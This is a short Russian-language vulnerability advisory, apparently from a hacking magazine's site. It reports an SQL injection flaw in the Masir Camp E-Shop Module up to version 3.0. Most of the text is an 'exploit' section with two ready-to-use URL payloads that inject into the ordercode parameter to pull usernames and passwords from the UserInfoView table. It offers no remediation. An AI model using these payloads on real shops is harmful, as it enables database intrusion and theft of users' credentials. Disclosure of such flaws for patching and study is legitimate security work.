Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Masir Camp E-Shop Module <= 3.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.
Эксплоит:
http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName
from UserInfoView)--
http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password
from UserInfoView)--